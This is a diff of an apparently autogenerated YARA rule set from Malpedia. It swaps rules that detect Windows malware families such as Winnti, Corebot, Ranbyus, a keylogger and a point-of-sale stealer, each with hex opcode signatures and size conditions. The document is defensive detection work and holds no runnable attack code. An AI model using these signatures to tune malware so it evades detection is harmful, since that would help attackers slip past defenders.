 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.asruex_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.corebot_auto.yar#L1-L174"
 		license_url = "N/A"
-		logic_hash = "a14db0e4e44f1156fe16afe843345aa29b9b1f1eb3cc060b10e0bcdf06eb97d4"
+		logic_hash = "39cc93a6c914fbc005d1108deabcbfdb71a7ef825d8251a576b5ab326c580118"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135344,34 +135847,40 @@ rule MALPEDIA_Win_Asruex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 740e 85ed 740a }
-		$sequence_1 = { ff15???????? 85c0 7407 3d14270000 }
-		$sequence_2 = { 3c78 7404 3c58 7505 bb01000000 }
-		$sequence_3 = { e8???????? 83f8ff 7407 3d0000a000 }
-		$sequence_4 = { 7408 3c0d 7404 3c0a 7516 }
-		$sequence_5 = { 83f801 740e 83f803 7409 83f802 }
-		$sequence_6 = { 3c09 7408 3c0d 7404 3c0a 7516 }
-		$sequence_7 = { 7404 3c58 7505 bb01000000 }
-		$sequence_8 = { 740c 3c09 7408 3c0d 7404 3c0a 7516 }
-		$sequence_9 = { 3c0d 7404 3c0a 7516 }
+		$sequence_0 = { 31f6 46 8918 89f0 83c40c 5e 5f }
+		$sequence_1 = { 31f6 8955e8 894dec 43 8b4dec 8d55f0 e8???????? }
+		$sequence_2 = { 0fb618 895de8 c745ec07000000 8d141b 84db 8955e8 }
+		$sequence_3 = { 31c0 40 8932 5e c3 31c0 ebfa }
+		$sequence_4 = { 50 e8???????? 83c404 29f7 01f3 8b75ec 56 }
+		$sequence_5 = { 50 ff15???????? 85c0 7418 8b0e }
+		$sequence_6 = { 51 ff15???????? 85c0 0f95c0 eb08 c70600000000 31c0 }
+		$sequence_7 = { 0fb610 8955e8 c745ec07000000 8d0412 84d2 8945e8 783f }
+		$sequence_8 = { e8???????? 807e5800 7509 ff7654 ff15???????? 807e5000 }
+		$sequence_9 = { ff15???????? 8d4634 50 ff15???????? 8d4e0c e8???????? }
+		$sequence_10 = { eb10 6800800000 6a00 56 }
+		$sequence_11 = { ff7010 ff7014 e8???????? 8b45e0 }
+		$sequence_12 = { 85ff 740f 57 ff7508 }
+		$sequence_13 = { ff15???????? 807e5000 7509 ff764c ff15???????? 8d4634 50 }
+		$sequence_14 = { ff742428 e8???????? 8b442424 8d4c2410 }
+		$sequence_15 = { 85c0 7515 8b4624 3b4620 }
 
 	condition:
-		7 of them and filesize < 1564672
+		7 of them and filesize < 1302528
 }
-rule MALPEDIA_Win_Warhawk_Auto : FILE
+rule MALPEDIA_Win_Winnti_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d92d335d-f362-53f6-93fa-a01200e00bae"
+		id = "8877d2db-c061-5f0c-9030-9148176d6e19"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warhawk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.warhawk_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.winnti_auto.yar#L1-L239"
 		license_url = "N/A"
-		logic_hash = "d9e9a0b8b1caa43bf9cbeab42b90b2f052f6c3a1e02d41041e6ffa8282518c4f"
+		logic_hash = "17da510395f95f1363bc518ade4bb0caf94e359f90bb002c059a140da569d4ec"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -135383,32 +135892,46 @@ rule MALPEDIA_Win_Warhawk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f84d4feffff 5f 8bc6 5e 5b }
-		$sequence_1 = { 803c0a20 7706 41 894e08 ebf0 3bc8 7504 }
-		$sequence_2 = { ff7510 e8???????? 8b7d08 8bf0 85ff 0f84b1000000 8b5d0c }
-		$sequence_3 = { 0f8490000000 8d45f4 0f57c0 50 0f2945e0 }
-		$sequence_4 = { 50 8d44247c 50 8d842474030000 68???????? 50 ffd6 }
-		$sequence_5 = { a3???????? eb33 8b85f8fbffff 8b04b0 0305???????? 50 68???????? }
-		$sequence_6 = { 8bf0 8b85f0f7ffff ff7010 a1???????? 68???????? 68???????? }
-		$sequence_7 = { 8974243c ebce 8b44243c 47 8974243c 8930 894604 }
-		$sequence_8 = { 7407 8b4e04 8b06 8901 8b0e }
-		$sequence_9 = { eb49 b9???????? 8bc2 8a18 3a19 885dfb bb00000000 }
+		$sequence_0 = { 83c408 e9???????? 8b44241c 8bce 50 e8???????? }
+		$sequence_1 = { 8b0d???????? 85c9 746f 8b0d???????? 85c9 }
+		$sequence_2 = { 50 e8???????? 83c404 c7430c00000000 83c8ff }
+		$sequence_3 = { f7d1 49 81f904010000 0f83e9010000 53 }
+		$sequence_4 = { 3d10a00000 0f8ff4010000 0f84e2010000 051f60ffff 83f82e 0f8700010000 33d2 }
+		$sequence_5 = { 8d4c2413 c1e206 51 6a02 }
+		$sequence_6 = { 3c02 7519 8b4c2430 8b442424 8d53ec }
+		$sequence_7 = { e8???????? 85c0 7e24 8b54241c 83c201 83d700 }
+		$sequence_8 = { 72e2 eb04 8b6c1f02 488b742460 4863cd 8bd7 }
+		$sequence_9 = { 488bc7 4c8d9c24d0000000 498b5b20 498b7328 498be3 415f }
+		$sequence_10 = { ff15???????? 488d15af4b0100 488bcb 488905???????? ff15???????? 488d15884b0100 }
+		$sequence_11 = { 488d0d33f1ffff 4885c0 7422 8930 488d7808 }
+		$sequence_12 = { e8???????? 488bd8 488d05d03b0100 4885db 488d4f38 480f44d8 488bd3 }
+		$sequence_13 = { 4533c0 488bc8 488bd3 ff15???????? 4d85ff }
+		$sequence_14 = { eb02 33ff 488bd7 488d4d9f e8???????? }
+		$sequence_15 = { 4533db 488d2d7d1c0000 8b7320 448b7324 }
+		$sequence_16 = { 4889842400020000 8b4108 4c8bc2 4533c9 41894004 4889542420 33d2 }
+		$sequence_17 = { 4c8d25b6f10000 498b0c24 4d8bc5 488bd3 e8???????? }
+		$sequence_18 = { 488b8d00010000 ff15???????? 90 488d8d80000000 ff15???????? 90 }
+		$sequence_19 = { 4c8bc0 488d155d520100 488bcb e8???????? 48837d0f10 7209 }
+		$sequence_20 = { 41c6400701 eb0f 4080fe05 7509 41800880 41c6400704 410fb64807 }
+		$sequence_21 = { 7409 90 48ffc0 403830 }
+		$sequence_22 = { 83feff 7423 83fefe 741e 488bce 488bc6 488d15f8ba0a00 }
+		$sequence_23 = { 488bb5c8030000 448bc0 4585c0 0f84ca000000 }
 
 	condition:
-		7 of them and filesize < 2345984
+		7 of them and filesize < 1581056
 }
-rule MALPEDIA_Win_Zxxz_Auto : FILE
+rule MALPEDIA_Win_Ranbyus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7dd263db-5dc9-5446-993f-e84614693a03"
+		id = "4a2a0ab8-1d46-5117-bb36-6bc4aa1f9933"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxxz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zxxz_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ranbyus_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "7a7e7dba53ef8e0486a9f712bcc36135ae7e5d2a4697169aaecab71dcaa9f879"
+		logic_hash = "330e6be70ed45bf6b2dbed5046fb65bb22576b8352f6395b54bf453a6f591094"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135422,32 +135945,32 @@ rule MALPEDIA_Win_Zxxz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd6 83c40c 33c0 8bff 8a88b0005f00 }
-		$sequence_1 = { 68f8000000 50 8d8c240e010000 51 6689842410010000 e8???????? }
-		$sequence_2 = { 83c404 68???????? 681c020000 57 ffd6 }
-		$sequence_3 = { ffd5 83c40c 68???????? 68fa000000 }
-		$sequence_4 = { 52 ff15???????? 8b3d???????? 8bf0 56 6a01 6a01 }
-		$sequence_5 = { 33c4 89842404200000 53 56 8b35???????? }
-		$sequence_6 = { 668b0d???????? 66890f bf???????? e8???????? 84c0 7407 }
-		$sequence_7 = { c605????????01 ffd3 e8???????? 6830750000 ffd3 6a01 6a00 }
-		$sequence_8 = { 50 56 ff15???????? 8b2d???????? 57 6800100000 53 }
-		$sequence_9 = { 83c408 85c0 752f 8d442408 }
+		$sequence_0 = { a1???????? 85c0 751c 6a04 e8???????? }
+		$sequence_1 = { 6a01 6a00 68???????? 68???????? 68???????? e8???????? }
+		$sequence_2 = { e8???????? 59 8b4e05 89410b 8b4605 39780b 7407 }
+		$sequence_3 = { 57 e8???????? 8b7f28 59 }
+		$sequence_4 = { 0bc8 51 e8???????? 8bf8 59 85ff 7422 }
+		$sequence_5 = { a807 752a c1e802 85c0 }
+		$sequence_6 = { c20400 53 55 6a0c 8be9 e8???????? 8bd8 }
+		$sequence_7 = { e8???????? e8???????? 8bce e8???????? 6a03 }
+		$sequence_8 = { 5e eb02 33c0 83630400 83630800 }
+		$sequence_9 = { 5f 5e 5b 5d c21000 57 ff760c }
 
 	condition:
-		7 of them and filesize < 4142080
+		7 of them and filesize < 638976
 }
-rule MALPEDIA_Win_Qaccel_Auto : FILE
+rule MALPEDIA_Win_Nimgrabber_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1024ae4a-8ecf-5647-a954-71832685cf06"
+		id = "3417f107-706b-5ec9-a82e-ecd192636787"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.qaccel_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimgrabber"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nimgrabber_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "5f2f18c31debd22ba8cc6fab103208438701251a4ea3f2ead7d07424fdf86ff4"
+		logic_hash = "d297cfdaadbf9a62a41740c1e9e183f352f7bffa358a9fd4217b0060da18e6ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135461,32 +135984,32 @@ rule MALPEDIA_Win_Qaccel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bd0 0f87ea010000 e9???????? 8b4df4 33ff 81e1ffff0000 }
-		$sequence_1 = { 6a0c 8bd8 ffd7 8bf8 8b4620 8d55f0 52 }
-		$sequence_2 = { 41 83c210 894df8 8b1b }
-		$sequence_3 = { 85c0 0f84b8000000 0f8810000000 0f890a000000 5f }
-		$sequence_4 = { 0f8488000000 53 57 56 8d4d9c e8???????? 8b7da0 }
-		$sequence_5 = { 33c0 8d95fcfeffff f2ae f7d1 2bf9 }
-		$sequence_6 = { 8b45fc 51 8b4df4 2bc1 2bc7 40 99 }
-		$sequence_7 = { 8b1d???????? f7d1 49 742d 8945fc 8d45fc }
-		$sequence_8 = { 03da 668b03 50 ffd6 668b4b02 8bf8 51 }
-		$sequence_9 = { f3a4 668b4df8 668903 66894b02 ff15???????? }
+		$sequence_0 = { 7c79 8b4500 85c0 0f8457040000 8b10 39da 0f862d040000 }
+		$sequence_1 = { e9???????? 8b4c2434 c70424???????? 89442438 894c2404 e8???????? 8b442438 }
+		$sequence_2 = { 891c24 ffd0 83ec2c 83f8ff 0f94c3 e9???????? 8bbc2498000000 }
+		$sequence_3 = { e8???????? 8b15???????? 89c3 8d7310 85d2 0f84ab010000 01f5 }
+		$sequence_4 = { 0f49fa 85c9 0f84c8000000 89ce 8b4904 89f2 89c8 }
+		$sequence_5 = { 894c2404 c70424???????? e8???????? c7470400000000 ba???????? 89f9 c7442408b0000000 }
+		$sequence_6 = { 0f8f2b0c0000 31c0 8b742474 85f6 781e 83fe5f 0f845e1a0000 }
+		$sequence_7 = { 56 89ce 53 83ec2c 8b19 89542410 85db }
+		$sequence_8 = { 83ec24 8b742430 8b7c2434 c744240429000000 c70424???????? e8???????? 8d4c241c }
+		$sequence_9 = { 89442404 8b442424 890424 e8???????? e9???????? 83e801 893424 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 1238016
 }
-rule MALPEDIA_Win_Pandora_Auto : FILE
+rule MALPEDIA_Win_Webc2_Qbp_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "29457312-58e8-5036-91e5-0a52a49209e8"
+		id = "fee8b4c8-beb4-5f15-8081-5f10952e51d6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pandora_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_qbp_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "22cda535b77940d9842b4e203432bc4f86a63cc5bae293ffa14fa51707bd5eff"
+		logic_hash = "257413d68538251f3adda377abdcb2ea5b8000f62907fcc22ea1c060ea83ae47"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135500,32 +136023,32 @@ rule MALPEDIA_Win_Pandora_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 415d c3 8b894c010000 4889742468 e8???????? 488bf0 4885c0 }
-		$sequence_1 = { 85c0 7541 895c2438 eb43 4c8d442438 488d542420 e8???????? }
-		$sequence_2 = { 33d2 448d4228 ffd0 488b4b58 e8???????? 488b4b50 4885c9 }
-		$sequence_3 = { 488b7c2440 488d542450 488d4c2438 e8???????? 85c0 0f85e5000000 488d45f0 }
-		$sequence_4 = { 57 4155 4156 488d6c24d0 4881ec30010000 8b01 498bd9 }
-		$sequence_5 = { c1c807 8bca c1ea03 c1c10e 33c8 33ca 4403c9 }
-		$sequence_6 = { 49ffc0 4c3bc7 72d2 488bd6 488d4def e8???????? 8bd8 }
-		$sequence_7 = { 440bc0 0fb602 41c1e008 440bc0 0fb64206 0bc8 4489442430 }
-		$sequence_8 = { 33d5 33542420 4133c2 33c3 d1c2 05d6c162ca c1cb02 }
-		$sequence_9 = { 0f84f7010000 833801 752d 0f1001 498d4b18 660f73d808 66490f7ec0 }
+		$sequence_0 = { c20400 55 8bec 83ec08 894df8 8b4508 25ffff0000 }
+		$sequence_1 = { 51 8b4de4 e8???????? eb2b 8b55e4 0fbf8246100000 05fd000000 }
+		$sequence_2 = { 66898c504c520000 0fbf5508 0fbf45fc 8b4df8 8b75f8 668b945648100000 6689944148100000 }
+		$sequence_3 = { eb2b 8b55e4 0fbf8246100000 05fd000000 50 8b4de4 }
+		$sequence_4 = { 83c001 50 8b8d486cffff 51 }
+		$sequence_5 = { 83bdf46affff00 7504 33c0 eb57 8b85f46affff }
+		$sequence_6 = { 837d0800 740e 837d0c00 7408 8b45f4 }
+		$sequence_7 = { 894df8 c745fc00000000 6a01 8d45fc 50 8b4df8 e8???????? }
+		$sequence_8 = { ff15???????? 8945e4 837de4ff 7511 8b4de8 51 ff15???????? }
+		$sequence_9 = { 8b95e8fdffff 52 e8???????? 83c404 8985f0feffff c745fc00000000 c685f8feffff00 }
 
 	condition:
-		7 of them and filesize < 1032192
+		7 of them and filesize < 630784
 }
-rule MALPEDIA_Win_Spyder_Auto : FILE
+rule MALPEDIA_Win_Ddkeylogger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5e1aebf0-6155-5533-b005-6b02cbbc8082"
+		id = "3fb8455b-5bc3-5fd3-8427-a0f169965730"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spyder_auto.yar#L1-L173"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkeylogger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ddkeylogger_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "0a4823dcbe7cde22c22d2c4c8ece9fed1a6046b4847d90f2e0d8e717ed405fab"
+		logic_hash = "fadbff39943f10b1213064afba0274f50487808fd2b1956572db1fecae4dc6f6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135539,38 +136062,32 @@ rule MALPEDIA_Win_Spyder_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d1587a10000 488d0d68a10000 e8???????? 488d1584a10000 488d0d75a10000 e8???????? }
-		$sequence_1 = { ff5330 ffc6 4883c708 3b7318 7cdf 488b7c2438 488b4b10 }
-		$sequence_2 = { 4c8b4638 498bcc 0fb7d0 4985c6 }
-		$sequence_3 = { 488d0525160000 488d0d6e210000 488905???????? 488d0500160000 48890d???????? 488905???????? 488d05f3150000 }
-		$sequence_4 = { 48ffc0 4883f83c 7647 498bcd e8???????? 4c8d05478a0000 41b903000000 }
-		$sequence_5 = { 488d3d60930000 eb0e 488b03 4885c0 7402 ffd0 }
-		$sequence_6 = { 488bc8 ff15???????? 488d15c05e0000 488bce 488905???????? ff15???????? }
-		$sequence_7 = { 4c8d05ca930000 388c2498000000 0f94c1 4803da }
-		$sequence_8 = { 51 e8???????? 8dbc2494050000 83c9ff 33c0 83c40c }
-		$sequence_9 = { 8dbc24ad050000 889c24ac050000 f3ab 66ab aa }
-		$sequence_10 = { 8ac8 80e920 ebe0 80a00049091000 }
-		$sequence_11 = { 8d8424900d0000 57 50 56 895c2430 }
-		$sequence_12 = { f2ae f7d1 2bf9 682b010000 8bf7 8be9 8bfa }
-		$sequence_13 = { ff15???????? 8d54241c 53 52 8d8424900d0000 57 }
-		$sequence_14 = { 8dbc24a9000000 889c24a8000000 f3ab 66ab 83c424 aa }
-		$sequence_15 = { 8bc3 c1f805 8d3c85204b0910 8bc3 83e01f }
+		$sequence_0 = { 53 56 57 c745f8deb10000 c745fcae3c0000 }
+		$sequence_1 = { 8bc3 c1f805 8d3c8580ee4500 8bf3 }
+		$sequence_2 = { 85c0 752f 6804010000 8d85f8feffff }
+		$sequence_3 = { 7505 3b45fc 72bf 8a18 3a19 7501 40 }
+		$sequence_4 = { 6a00 6a00 56 8bf8 e8???????? 83c42c 57 }
+		$sequence_5 = { 8d9b00000000 8a08 40 84c9 75f9 8dbde8faffff 2bc6 }
+		$sequence_6 = { 56 ff15???????? 8bb5d8faffff 019ddcfaffff 6806030000 8d8de8faffff 6a00 }
+		$sequence_7 = { e8???????? 8d95b8faffff 52 52 }
+		$sequence_8 = { 8bc7 2bc1 0fb65901 881c08 0fb619 }
+		$sequence_9 = { c1eb06 03de 0fb61493 885102 0fb65002 83e23f 0fb61432 }
 
 	condition:
-		7 of them and filesize < 1458176
+		7 of them and filesize < 808960
 }
-rule MALPEDIA_Win_Cryptoluck_Auto : FILE
+rule MALPEDIA_Win_Flowershop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c54fc8ef-3602-58f8-83b4-8208d9ae15d7"
+		id = "0c1734b8-36d9-5030-b687-4c9005cd52ad"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptoluck_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flowershop_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "0975548068cce5a595ab873e8bd23c5fffef61084104837a0ebc0f80661af758"
+		logic_hash = "fe80fc55a0148eaee88f1cb7adb18edcd9b995b61e3ef0f900df914eb5adb176"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135584,32 +136101,32 @@ rule MALPEDIA_Win_Cryptoluck_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83bd3cefffff00 7429 8b8544efffff c60000 8b8d44efffff 83c101 }
-		$sequence_1 = { 8b4df8 894de4 8b55fc 8955e8 837de400 }
-		$sequence_2 = { 8b4dec 83c101 894dec 833d????????00 740e 33d2 }
-		$sequence_3 = { 8d55d8 52 6a00 6819000200 }
-		$sequence_4 = { 8945f8 837df800 0f84d3000000 8b55f8 }
-		$sequence_5 = { ff15???????? b801000000 e9???????? 8d4dd8 51 }
-		$sequence_6 = { c1ea03 83ea0b 8b4514 8910 c745f801000000 eb0c }
-		$sequence_7 = { eb02 eb0a 837df400 0f848bfeffff 8b5518 8b45f8 }
-		$sequence_8 = { c785acf6ffff00000000 8d85acf6ffff 50 8d8da4f6ffff 51 8d95a0f6ffff }
-		$sequence_9 = { 8bec 83ec3c 8b4508 a3???????? 8b4d0c }
+		$sequence_0 = { 50 ff15???????? 85c0 59 0f8694000000 8d4604 50 }
+		$sequence_1 = { ff15???????? 8bf8 3bfb 7472 0fb705???????? 03c5 56 }
+		$sequence_2 = { 85ff 7419 57 6a00 ff15???????? 50 ff15???????? }
+		$sequence_3 = { 3bde 7479 57 8b3d???????? 56 56 56 }
+		$sequence_4 = { eb3d 8b4604 50 6a00 8b4804 894e04 ffd5 }
+		$sequence_5 = { 6a01 8906 8b4508 8930 58 5f 5e }
+		$sequence_6 = { 57 e8???????? 59 85c0 59 746f 57 }
+		$sequence_7 = { 8bf0 59 85f6 59 7455 80650b00 }
+		$sequence_8 = { 817dfc03010000 7507 6a04 e9???????? a1???????? 85c0 7536 }
+		$sequence_9 = { 75ea ff749e04 43 ff7510 ff550c 59 85c0 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 829440
 }
-rule MALPEDIA_Win_Chir_Auto : FILE
+rule MALPEDIA_Win_Glitch_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "93c47970-4fc6-58a0-955d-3bbd03cb7c7f"
+		id = "167489a1-806c-57ac-870b-1a5711737bf5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chir_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.glitch_pos_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "5c119df17edac6114f59bfe70ffc894c68fbc3a6604aa7943345ac49df6c4fce"
+		logic_hash = "8974caf746bb63b369da7b75c4e0e1a2b35b653a94e981b459531b393a112a37"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135623,32 +136140,32 @@ rule MALPEDIA_Win_Chir_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45f4 50 c745f421352432 c745f851173300 e8???????? }
-		$sequence_1 = { 48 59 6a00 5e 7419 8d4c35f8 8a11 }
-		$sequence_2 = { c745fc51173300 e8???????? 83c410 48 }
-		$sequence_3 = { 33c9 807df905 0f94c1 33d2 48 8d4c0901 }
-		$sequence_4 = { 59 8bfb 7419 8d4c3df0 8a11 }
-		$sequence_5 = { e8???????? 59 33c9 48 }
-		$sequence_6 = { 8811 3bf0 72e7 57 }
-		$sequence_7 = { 8bc4 fc 56 57 }
-		$sequence_8 = { 8bfb 7419 8d4c3df0 8a11 80f2fc 80c202 }
-		$sequence_9 = { 8d45f8 50 c745f840214125 c745fc32212400 }
+		$sequence_0 = { 8d45a0 50 6a03 e8???????? 83c410 8b4508 8b00 }
+		$sequence_1 = { 668985f0feffff 8d4598 50 8d45a8 50 6a02 }
+		$sequence_2 = { 8b45d0 8b00 ff75d0 ff5040 dbe2 8945cc 837dcc00 }
+		$sequence_3 = { 662d0100 0f80b0010000 6689459c 8d459c 50 }
+		$sequence_4 = { 837de000 7d1a 6894000000 68???????? ff75e4 ff75e0 e8???????? }
+		$sequence_5 = { eb07 83a5fcfdffff00 8d45c4 50 8d45cc 50 6a02 }
+		$sequence_6 = { 8b00 ffb520ffffff ff5014 dbe2 89851cffffff }
+		$sequence_7 = { c78524ffffff08000000 c7853cffffff3c364600 c78534ffffff08000000 8d45a8 }
+		$sequence_8 = { 68a4020000 68???????? ff7508 ffb5d0feffff e8???????? 898550feffff eb07 }
+		$sequence_9 = { ff75d8 e8???????? dc9d68ffffff dfe0 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 1024000
 }
-rule MALPEDIA_Win_Cactus_Auto : FILE
+rule MALPEDIA_Win_Entryshell_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7aadb4fa-1562-5d38-a064-9b891a040980"
+		id = "f7004160-2921-54d6-8486-e3c529e5d739"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cactus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cactus_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.entryshell"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.entryshell_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "4cf0fe68934e99fc9c68b61a4ebb1a3c34839913d17fce2a657defa1e18dd776"
+		logic_hash = "99234173465f72334050322378ee4ca31b5cc7ed20c04f0fbc21ed7db2e5d8fb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135662,32 +136179,32 @@ rule MALPEDIA_Win_Cactus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 48897cc500 488b05???????? c705????????01000000 4883c010 488905???????? f08305????????01 }
-		$sequence_1 = { e8???????? 488d05524c3300 4c8b442430 4889e9 4a8d543850 e8???????? 448b9c240c030000 }
-		$sequence_2 = { f30f6f842480000000 660fc6c901 660f73d138 48894c2478 660fc6c001 660fdbc6 660fd4c1 }
-		$sequence_3 = { e8???????? 4c8d05648e1900 ba80010000 488d0d388d1900 e8???????? 4531c0 ba94000000 }
-		$sequence_4 = { e8???????? 4c8d05e1cc2400 bad3010000 488d0d6dca2400 e8???????? 4531c0 ba65000000 }
-		$sequence_5 = { e8???????? 488d159c933a00 4889f9 4989c0 e8???????? 85c0 7425 }
-		$sequence_6 = { e8???????? 4889c7 4885c0 0f8447010000 488d5008 4889f1 e8???????? }
-		$sequence_7 = { 89c2 31c6 4189c3 c1c202 41c1c30a 31f2 4431da }
-		$sequence_8 = { e8???????? 488b15???????? 4889f1 e8???????? 85c0 755f 803b00 }
-		$sequence_9 = { e8???????? 4889c3 4885c0 0f84ba000000 b801000000 874310 e8???????? }
+		$sequence_0 = { 8b0e 3b0c85f4542501 7417 8b4d08 a1???????? 858150030000 7507 }
+		$sequence_1 = { 02410b 02c0 02410c 02c0 02410d 02c0 02410e }
+		$sequence_2 = { 84c9 742b 8d7e01 8a07 8bf7 0fb6d0 8bdf }
+		$sequence_3 = { 8b35???????? 8bd6 c1e208 8d8290e72501 8bc8 89442420 }
+		$sequence_4 = { 83c40c 68???????? 6800010000 68???????? e8???????? 83c40c 807c241400 }
+		$sequence_5 = { 51 50 e8???????? 83c410 b001 5f 5e }
+		$sequence_6 = { 6800080000 50 ff35???????? ff15???????? 85c0 0f8eb2010000 8d85d0efffff }
+		$sequence_7 = { 85c0 0f85fb000000 8db5b8f7ffff 0f1f4000 8d85b8efffff 803e00 7438 }
